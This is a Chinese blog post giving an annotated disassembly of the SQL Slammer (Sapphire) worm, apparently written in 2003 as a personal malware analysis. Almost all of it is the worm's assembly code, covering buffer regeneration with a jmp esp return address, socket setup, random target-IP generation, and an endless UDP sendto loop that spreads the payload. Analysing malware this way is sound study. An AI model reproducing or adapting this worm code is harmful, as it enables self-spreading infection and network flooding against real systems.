2. 技术人生
    3. SQL worm sapphire 关键代码分析

    SQL worm sapphire 关键代码分析

    技术2022-05-11  141
    突然间对它SQL worm sapphire的代码非常感兴趣,针对网上给出的test code(自己抓包也行), 一直读到临晨4点,终于把关键代码都注释起来了,第一次自己剖析病毒,感觉 挺好的,这个病毒太精湛了。如有错误之处,请大家斧正。                                                                                yangrunhua 2/9/03 04:30am注意:具体地址在不同版本机器上有差异 0012FCED             push 42b0c9dch ;在sqlsort.dll加载后42B0C9DC处为FFE4即jmp esp,作为返回地址0012FCF2 B801010101  mov  eax,1010101h0012FCF7 31C9        xor  ecx,ecx0012FCF9 B118        mov  cl,18h0012FCFB 50          push eax0012FCFC E2FD        loop 0012FCFB     ;循环填充01010101h0012FCFE 3501010105  xor  eax,5010101h ;eax=04000000h0012FD03 50          push eax ;从程序头到此用于再生需溢出的缓冲区   ebp+04h;;   /x04/x01/0x01......./0x01/0x01/0xDC/0xC9/0xB0/0x420012FD04 89E5        mov  ebp,esp      ;save esp to ebp0012FD06 51          push ecx          0012FD07 682E646C6C  push 6C6C642Eh0012FD0C 68656C3332  push 32336C65h0012FD11 686B65726E  push 6E72656Bh    ;.string "kernel32.dll"    ebp-10h0012FD16 51          push ecx0012FD17 686F756E74  push 746E756Fh0012FD1C 6869636B43  push 436B6369h0012FD21 6847657454  push 54746547h    ;.string "GetTickCount"    ebp-20h0012FD26 66B96C6C    mov  cx,6C6Ch     0012FD2A 51          push ecx          0012FD2B 6833322E64  push 642E3233h0012FD30 687773325F  push 5F327377h    ;.string "ws2_32.dll"      ebp-2ch0012FD35 66B96574    mov  cx,7465h0012FD39 51          push ecx0012FD3A 68736F636B  push 6B636F73h    ;.string "socket"          ebp-34h0012FD3F 66B9746F    mov  cx,6F74h0012FD43 51          push ecx0012FD44 6873656E64  push 646E6573h    ;.string "sendto"          ebp-3ch0012FD49 BE1810AE42  mov  esi,42AE1018h;address of GetDllHandle0012FD4E 8D45D4      lea  eax,[ebp-2Ch]0012FD51 50          push eax          ;address of "ws2_32.dll"   ebp-40h0012FD52 FF16        call dword ptr [esi]; call GetDllHandle0012FD54 50          push eax          ; HINSTANCE of ws2_32.dll  ebp-40h0012FD55 8D45E0      lea  eax,[ebp-20h]0012FD58 50          push eax          ;address of "GetTickCount" ebp-44h0012FD59 8D45F0      lea  eax,[ebp-10h]0012FD5C 50          push eax          ;address of "kernel32.dll" ebp-48h0012FD5D FF16        call dword ptr [esi]; call GetDllHandle0012FD5F 50          push eax          ;address of kernel32.dll   ebp-48h0012FD60 BE1010AE42  mov  esi,42AE1010h0012FD65 8B1E        mov  ebx,dword ptr [esi]0012FD67 8B03        mov  eax,dword ptr [ebx]0012FD69 3D558BEC51  cmp  eax,51EC8B55h0012FD6E 7405        je   0012FD750012FD70 BE1C10AE42  mov  esi,42AE101Ch0012FD75 FF16        call dword ptr [esi]; call GetProcAddress for address of GetTickCount0012FD77 FFD0        call eax            ; call GetTickCount0012FD79 31C9        xor  ecx,ecx0012FD7B 51          push ecx        0012FD7C 51          push ecx  ; must be 0 of last 8 bytes of sockaddr_in struct ebp-48h0012FD7D 50           push eax        ; Random Value (for dest IP) ebp-4ch0012FD7E 81F10301049A xor ecx,9A040103h0012FD84 81F101010101 xor ecx,1010101h0012FD8A 51           push ecx  ;ecx=0x9b050002 AF_INET 0x0002 + port 1435 htons(1435)=0x9b05 ebp-50h0012FD8B 8D45CC      lea  eax,[ebp-34h]0012FD8E 50          push eax         ;address of "socket"        ebp-54h0012FD8F 8B45C0      mov  eax,dword ptr [ebp-40h]0012FD92 50          push eax         ;address of ws2_32.dll      ebp-58h0012FD93 FF16        call dword ptr [esi]; call GetProcAddress for address of socket0012FD95 6A11        push 11h            ; UDP protocol           ebp-54h0012FD97 6A02        push 2              ; SOCK_DGRAM             ebp-58h0012FD99 6A02        push 2              ; AF_INET                ebp-5ch0012FD9B FFD0        call eax            ; call socket0012FD9D 50          push eax            ; socket descriptor for communication  ebp-54h0012FD9E 8D45C4      lea  eax,[ebp-3Ch]0012FDA1 50          push eax            ;address of "sendto"0012FDA2 8B45C0      mov  eax,dword ptr [ebp-40h]0012FDA5 50          push eax            ;address of ws2_32.dll0012FDA6 FF16        call dword ptr [esi]; call GetProcAddress for address of sendto0012FDA8 89C6        mov  esi,eax        ; esi has address of sendto  0012FDAA 09DB        or   ebx,ebx0012FDAC 81F33C61D9FF xor ebx,0FFD9613Ch0012FDB2 8B45B4      mov  eax,dword ptr [ebp-4Ch]; fill eax with last Random Value (dest IP)0012FDB5 8D0C40      lea  ecx,[eax+eax*2]0012FDB8 8D1488      lea  edx,[eax+ecx*4]0012FDBB C1E204      shl  edx,40012FDBE 01C2        add  edx,eax0012FDC0 C1E208      shl  edx,80012FDC3 29C2        sub  edx,eax0012FDC5 8D0490      lea  eax,[eax+edx*4]0012FDC8 01D8        add  eax,ebx0012FDCA 8945B4      mov  dword ptr [ebp-4Ch],eax; modify next Random Value (dest IP)0012FDCD 6A10        push 10h           ; addr length = 16 bytes0012FDCF 8D45B0      lea  eax,[ebp-50h]0012FDD2 50          push eax           ; address of sockaddr_in struct0012FDD3 31C9        xor  ecx,ecx0012FDD5 51          push ecx           ; flags = 00012FDD6 6681F17801  xor  cx,178h       ; len = 376 bytes0012FDDB 51          push ecx0012FDDC 8D4503      lea  eax,[ebp+3]0012FDDF 50          push eax           ; beginning of msg (we just generated), msg begins with 0x040012FDE0 8B45AC      mov  eax,dword ptr [ebp-54h]0012FDE3 50          push eax           ; socket descriptor for communication0012FDE4 FFD6        call esi      ; call sendto0012FDE6 EBCA        jmp  0012FDB2 ; infinite loop

    专利

    最新回复(0)